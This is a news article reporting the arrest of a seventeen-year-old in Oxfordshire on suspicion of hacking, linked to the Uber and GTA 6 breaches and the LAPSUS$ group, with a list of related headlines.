The City of London Police has arrested a seventeen-year-old teenager over suspicion of hacking amid the recent security breaches at Uber and Rockstar Games’ GTA 6. It is worth noting that the teen’s role in these hacks is still not confirmed.

**Arrest Details**

The teen was arrested from Oxfordshire and is still in police custody. However, the officials haven’t yet shared more details on the arrest and declined to confirm if the teen was arrested for the recent high-profile hacking incidents including Uber and Rockstar Games’ GTA 6.

According to the department’s tweet, the arrest was part of an ongoing investigation carried out in collaboration with the cybercrime unit of the National Crime Agency, UK. The police shared no other detail.

For your information, a couple of months ago, London police arrested and released 7 teens in connection with an investigation into the LAPSUS$ hacking gang.

Lapsus$ is a notorious group of teen hackers that mainly hunts for the source code of high-profile and large tech firms. Some of its previous and successful attacks include Samsung, Microsoft, Nvidia, Okta, and Ubisoft.

The Uber and GTA 6 hacker had also claimed to have access to the source code of both companies.

**Uber and Rockstar Games Hacking**

Uber hacking resulted in the halting of the company’s internal systems for some time. In contrast, Rockstar Games suffered a network intrusion that caused the leaking of unreleased footage of Grand Theft Auto 6.

The two hacks are believed to be committed by the same hacker, who’s identified as Tea Pot or “teapotuberhacker.”

Uber, on the other hand, has blamed the LAPSUS$ hackers for the breach, alleging that the attacker(s) are linked with the LAPSUS$ extortion gang that has remained active over the past year.

It must be noted that the Rockstar Games hacker also claimed responsibility for the Uber hack on his Telegram and fan-run GTA forum. It is assumed that “teapotuberhacker” is a LAPSUS$ ringleader.

1.  Microsoft and Okta Confirm Data Breach Claims by LAPSUS$
2.  Popular YouTuber Scuba Jake’s channel hacked to run crypto scam
3.  Ex-Uber CSO Joseph Sullivan charged over 2016 data breach cover up
4.  Russian Hacker Exploits GTA 5 PC Mod to Install Cryptocurrency Miner
5.  Grand Theft Auto (GTA) Fan Forum Hacked; Thousands of Accounts Stolen

Tag

#microsoft